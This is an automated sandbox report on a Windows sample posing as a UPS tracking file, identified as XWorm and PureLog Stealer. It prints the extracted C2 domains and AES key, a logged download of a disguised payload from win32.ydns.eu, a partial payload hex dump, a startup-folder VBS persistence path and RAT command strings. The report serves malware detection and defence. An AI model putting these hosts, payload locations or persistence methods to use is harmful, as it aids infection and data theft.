Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UPS tracking details.exe

Overview

General Information

Sample name:UPS tracking details.exe
Analysis ID:1627808
MD5:28badf3eb1aa6ce975fee86e6ec1dc14
SHA1:8f19c7dbdde308e463b0412d73ea7083b1bcc816
SHA256:7f1764a28d27f381701d9254166241607a37a02eb2fe80d682baf15236da5b7e
Tags:exeUPSuser-abuse_ch
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Downloads files with wrong headers with respect to MIME Content-Type
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UPS tracking details.exe (PID: 3164 cmdline: "C:\Users\user\Desktop\UPS tracking details.exe" MD5: 28BADF3EB1AA6CE975FEE86E6EC1DC14)
    • UPS tracking details.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\UPS tracking details.exe" MD5: 28BADF3EB1AA6CE975FEE86E6EC1DC14)
      • WerFault.exe (PID: 1104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
UPS tracking details.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Remaining.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x6c8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6d2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6e41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6b01:$cnc4: POST / HTTP/1.1
        00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x1eb4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1ebe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1ecfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x1e9bd:$cnc4: POST / HTTP/1.1
          00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            1.2.UPS tracking details.exe.3585570.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              1.2.UPS tracking details.exe.59f0000.12.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                1.2.UPS tracking details.exe.59f0000.12.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  1.2.UPS tracking details.exe.27756d4.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    1.2.UPS tracking details.exe.27756d4.1.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                    • 0x3be5:$str01: $VB$Local_Port
                    • 0x3bd6:$str02: $VB$Local_Host
                    • 0x3ee6:$str03: get_Jpeg
                    • 0x388e:$str04: get_ServicePack
                    • 0x493b:$str05: Select * from AntivirusProduct
                    • 0x4b39:$str06: PCRestart
                    • 0x4b4d:$str07: shutdown.exe /f /r /t 0
                    • 0x4bff:$str08: StopReport
                    • 0x4bd5:$str09: StopDDos
                    • 0x4cd7:$str10: sendPlugin
                    • 0x4d57:$str11: OfflineKeylogger Not Enabled
                    • 0x4ebd:$str12: -ExecutionPolicy Bypass -File "
                    • 0x4fe6:$str13: Content-length: 5235
                    Click to see the 9 entries

                    Data Obfuscation

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\UPS tracking details.exe, ProcessId: 3164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remaining.vbs
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                    Source: C:\Users\user\AppData\Roaming\Remaining.exeReversingLabs: Detection: 21%
                    Source: UPS tracking details.exeReversingLabs: Detection: 21%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: bin12.ydns.eu,bin14.ydns.eu,kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 4050
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <123456789>
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: DOGGY XWORM
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
                    Source: UPS tracking details.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: UPS tracking details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.pdbwz source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DED000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb0 source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UPS tracking details.exe, 00000001.00000002.1699691438.0000000005B30000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.0000000003764000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\user\Desktop\UPS tracking details.PDBD{ww`P source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UPS tracking details.exe, 00000001.00000002.1699691438.0000000005B30000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.0000000003764000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPzo,C:\Windows\System.pdb source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: UPS tracking details.exe, 00000003.00000002.2790126652.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ##.pdb source: UPS tracking details.exe, 00000003.00000002.2789943672.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: bin12.ydns.eu
                    Source: Malware configuration extractorURLs: bin14.ydns.eu
                    Source: Malware configuration extractorURLs: kingsbkup1.ydns.eu
                    Source: Malware configuration extractorURLs: smfcs1.ydns.eu
                    Source: Malware configuration extractorURLs: smfcs3.ydns.eu
                    Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 07:45:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 03 Mar 2025 03:22:59 GMT ETag: "fa608-62f67ac5438e3" Accept-Ranges: bytes Content-Length: 1025544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 3b 86 64 13 ed a7 7c 3b e7 bd 1a a8 88 96 ae 00 f9 bd 16 59 87 65 42 cc 9d 47 1b 8e 3b 73 17 53 17 8e 3f 45 8d 3e d6 53 9e dc a2 bb 73 89 ef 5b 08 17 e8 c4 d5 ad 73 20 24 c4 ea fe 57 44 68 b8 d2 10 76 ac e1 71 82 d2 ca c7 08 de 88 a3 3a d1 21 cf a1 b6 6d 9a 49 5e 5b 6c e2 11 03 78 c3 6b 1f 11 5f 92 ac bd 47 6d 5a db e6 2a a0 64 47 ec d9 f0 dd 34 f3 8b a8 96 11 20 9a 87 03 cf d1 86 80 e9 11 4d 3f 69 d1 7a 86 19 1d 89 7e 35 2f ef a4 18 43 e4 7f f7 7f 8e f9 7a ef d7 53 ad 43 d9 82 15 ea 27 c9 2d a7 8e 96 e4 e7 ef f7 04 55 5c 69 5d b4 5e 6d 8a 88 56 6a c6 69 3b 02 08 2a dd 58 23 4a 1b 17 47 24 b5 ad 62 38 22 64 ce 22 5f 9c 28 6a 25 db 9b c9 8a 78 22 d5 d0 c9 6d ec 0b b6 25 fb 15 f8 c1 2f cf 89 54 95 d5 81 4a 3b 6c af 2e 23 83 61 33 d2 60 75 5f 00 46 93 32 cc 1a 6b d3 6b f5 8b 00 ed ce 62 cb e7 93 91 cb 11 41 98 b1 bb 6e d4 17 58 c4 88 64 75 27 d9 c2 b8 84 4a f6 f2 67 75 74 df ca 45 59 68 2d c9 e9 f1 98 07 24 92 0a 70 cb c2 18 65 30 6c eb eb df 73 28 a0 3e 4b 36 e2 28 94 c5 eb 92 89 f7 57 d5 37 a5 9a 21 d5 8d 18 36 fa b0 b9 5c e4 fe 78 12 49 51 23 6d 42 b4 34 0a c1 5d 72 9f 98 61 45 f9 35 ce 5d c3 2c 44 1a 07 90 15 2f 4c 4a ac 60 47 60 28 44 1b 5e 6f bb fe 1d 2e c6 00 d6 bd 53 d6 4f 07 e5 b6 64 92 e4 7b 8a f4 11 00 22 aa 1e d4 09 8f 16 e3 5e 73 5a d3 f6 78 78 37 69 20 d1 e7 28 47 1c 05 08 55 de b9 bd e7 50 ea 66 54 e8 80 4f 04 7f d3 66 bb 82 9c 07 dc c7 ea 48 87 48 2e ba 63 e7 c4 c8 e0 6e 52 30 54 8f fe a9 f5 2b ab b9 d0 b5 43 17 7f eb ea 34 83 a2 86 c2 48 08 0c 01 49 cf 24 2b 8e be 37 21 97 42 96 75 30 8e 07 81 fe 99 8e d2 b7 d4 b3 07 88 c0 67 30 90 0f da bc 34 02 00 af d1 f4 35 83 e8 21 8a 7e 18 51 21 02 cc c7 2a a9 30 68 5b e3 f2 c4 72 50 74 7f 93 3d d4 fc 6a 32 7e e8 ac 72 17 86 47 d3 2b 6d a7 3f cc 36 71 00 ac eb 55 bb 5e 8c 5f cb 2f ca 57 15 46 a2 a9 22 2c 6d fc 19 2f 3e 8f b9 86 ae 99 41 e1 f3 a7 ae 3e 9f 96 ec c5 8a 32 2b 86 bc 7b 22 40 0b a9 40 72 4e c5 1d 42 b1 cb 1b 1c 41 9f e8 bb e8 21 26 b5 b2 53 54 0d 2b 1b 62 18 c3 e2 b9 66 18 af 47 be 8f df 9b 7a 63 35 fa a9 f9 72 3a 20 52 b6 8c 2e 1c 1f 98 04 0c eb db 40 8b 5f 1f e3 e3 81 db 41 4a 02 d8 ce 4d 4e 61 35 fb 98 5e 5b 44 ef fe 4f 6b a6 e9 e8 a6 b8 f8 9b 1e 98 29 a3 dd 82 74 0d 00 29 64 4e bb ed be 18 c1 b2 ab 26 a0 03 1f 57 1f 40 67 c7 02 b3 1d 89 57 d2 81 71 1f f8 36 0c c8 b1 2b d3 ab a5 6f 16 16 25 dd a4 43 dc 62 56 5c 74 c5 42 03 f0 3f 39 6c 4e 89 e3 18 8f d6 9b 3e f2 da 4d a9 b3 cd 7b 86 00 f6 09 82 7c 1b 6d 3a fa 4d d9 17 34 61 13 22 1b 95 06 2e c7 65 53 38 e0 57 be 0c 8a ce 75 c1 83 a1 46 ab 58 39 52 b5 6f a8 86 55 f0 9f ac 36 b5 f9 8d 76 2a 80 29 cb 00 54 a6 41 08 e1 3e 50 30 7b dd 33 12 ea 64 b5 52 b2 f9 c9 f0 7f 60 43 cb 77 5e 22 8f 30 c4 0f d2 62 cf 5c dc 29 e9 46 86
                    Source: global trafficTCP traffic: 192.168.2.7:61378 -> 1.1.1.1:53
                    Source: global trafficHTTP traffic detected: GET /never/lookinto/it/panel/uploads/Fjuzaw.pdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /never/lookinto/it/panel/uploads/Fjuzaw.pdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: win32.ydns.eu
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1681842901.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
                    Source: UPS tracking details.exe, Remaining.exe.1.drString found in binary or memory: http://www.newtonsoft.com/jsonschema
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.cloudinary.com
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, UPS tracking details.exe, 00000001.00000002.1695473543.00000000036B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Remaining.exe.1.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

                    System Summary

                    barindex
                    Source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 1.2.UPS tracking details.exe.27756d4.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 3.2.UPS tracking details.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 1.2.UPS tracking details.exe.27756d4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_007D0C781_2_007D0C78
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_007D0C2F1_2_007D0C2F
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_04A5D5281_2_04A5D528
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_04A5CF981_2_04A5CF98
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_04A535E41_2_04A535E4
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_0620F8A81_2_0620F8A8
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_0620E7F81_2_0620E7F8
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_0620E2C01_2_0620E2C0
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_061F00271_2_061F0027
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 1_2_061F00401_2_061F0040
                    Source: C:\Users\user\Desktop\UPS tracking details.exeCode function: 3_2_010E0B923_2_010E0B92
                    Source: C:\Users\user\Desktop\UPS tracking details.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 928
                    Source: UPS tracking details.exe, 00000001.00000002.1681842901.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003662000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1682564416.0000000002581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1699691438.0000000005B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1695473543.0000000003755000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnxfelbpex.dll" vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000002.1699502154.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: IsUseOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UseOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: useOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: PublicIdsTagsPrefixesprefixesCheckModemodeTransformationstransformationsTargetFormattargetFormatTargetPublicIdtargetPublicIdIsFlattenFoldersFlattenFoldersflattenFoldersIsFlattenTransformationsFlattenTransformationsflattenTransformationsExpiresAtexpiresAtIsUseOriginalFilenameUseOriginalFilenameuseOriginalFilenameIsAsyncAsyncasyncNotificationUrlnotificationUrlTargetTagstargetTagsIsKeepDerivedKeepDerivedkeepDerivedIsSkipTransformationNameSkipTransformationNameskipTransformationNameToParamsDictionaryset_Urlget_SecureUrlset_SecureUrlget_PublicIdset_PublicIdget_Bytesset_Bytesget_FileCountset_FileCountSecureUrlBytesFileCountAddCustomParamAddParamMinValueAddCoordinatescoordObj<>9__10_0PendingRejectedApprovedOverriddenImageRawset_Versionset_Uriget_SecureUriset_SecureUriset_LengthSecureUriLengthset_StatusCodeget_JsonObjset_JsonObjget_Errorset_Errorget_Limitset_Limitget_Remainingset_Remainingget_Resetset_ResetStatusCodeJsonObjLimitRemainingResetget_Messageset_MessageMessageStatusKindResponseUpdatedAtget_PublicIdsset_PublicIdsget_Contextset_Contextget_Typeset_Typeget_Commandset_CommandCommandRemoveAllget_Nameset_Nameget_Transformset_TransformName vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: set_DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DiscardOriginalFilename vs UPS tracking details.exe
                    Source: UPS tracking details.exe, 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: set_Transformationget_NotificationUrlset_NotificationUrlget_Statusset_Statusget_BatchIdset_BatchIdBatchIdget_Foldersset_FoldersFoldersget_Exifset_Exifget_Colorsset_Colorsget_Facesset_Facesget_Metadataset_Metadataget_Coordinatesset_Coordinatesget_MaxResultsset_MaxResultsget_Phashset_PhashExifColorsFacesMetadataPhashget_Createdset_Createdget_Derivedset_Derivedget_Moderationset_Moderationget_Predominantset_Predominantget_Infoset_InfoCreatedget_Customset_CustomCustomget_Googleset_GoogleGoogleget_Idset_IdIdget_Detectionset_Detectionget_RekognitionFaceset_RekognitionFaceget_BoundingBoxset_BoundingBoxget_Confidenceset_Confidenceget_Ageset_Ageget_Smileset_Smileget_Glassesset_Glassesget_Sunglassesset_Sunglassesget_Beardset_Beardget_Mustacheset_Mustacheget_EyeClosedset_EyeClosedget_MouthOpenWideset_MouthOpenWideget_Beautyset_Beautyget_Genderset_Genderget_Raceset_Raceget_Emotionset_Emotionget_Qualityset_Qualityget_Poseset_Poseget_EyeLeftPositionset_EyeLeftPositionget_EyeRightPositionset_EyeRightPositionget_EyeLeft_Leftset_EyeLeft_Leftget_EyeLeft_Rightset_EyeLeft_Rightget_EyeLeft_Upset_EyeLeft_Upget_EyeLeft_Downset_EyeLeft_Downget_EyeRight_Leftset_EyeRight_Leftget_EyeRight_Rightset_EyeRight_Rightget_EyeRight_Upset_EyeRight_Upget_EyeRight_Downset_EyeRight_Downget_NosePositionset_NosePositionget_NoseLeftset_NoseLeftget_NoseRightset_NoseRightget_MouthLeftset_MouthLeftget_MouthRightset_MouthRightget_MouthUpset_MouthUpget_MouthDownset_MouthDownConfidenceAgeSmileGlassesSunglassesBeardMustacheEyeClosedMouthOpenWideBeautyGenderRaceEmotionPoseEyeLeftPositionEyeRightPositionEyeLeft_LeftEyeLeft_RightEyeLeft_UpEyeLeft_DownEyeRight_LeftEyeRight_RightEyeRight_UpEyeRight_DownNosePositionNoseLeftNoseRightMouthLeftMouthRightMouthUpMouthDownget_TopLeftset_TopLeftget_Sizeset_SizeTopLeftget_Strictset_Strictget_Usedset_UsedStrictUsedget_Unsignedset_Unsignedget_Settingsset_SettingsUnsignedget_DisallowPublicIdset_DisallowPublicIdget_Backupset_Backupget_UseFilenameset_UseFilenameget_UniqueFilenameset_UniqueFilenameget_DiscardOriginalFilenameset_DiscardOriginalFilenameget_Proxyset_Proxyget_Folderset_Folderget_Overwriteset_Overwriteget_RawConvertset_RawConvertget_AllowedFormatsset_AllowedFormatsget_Categorizationset_Categorizationget_AutoTaggingset_AutoTaggingget_SimilarityS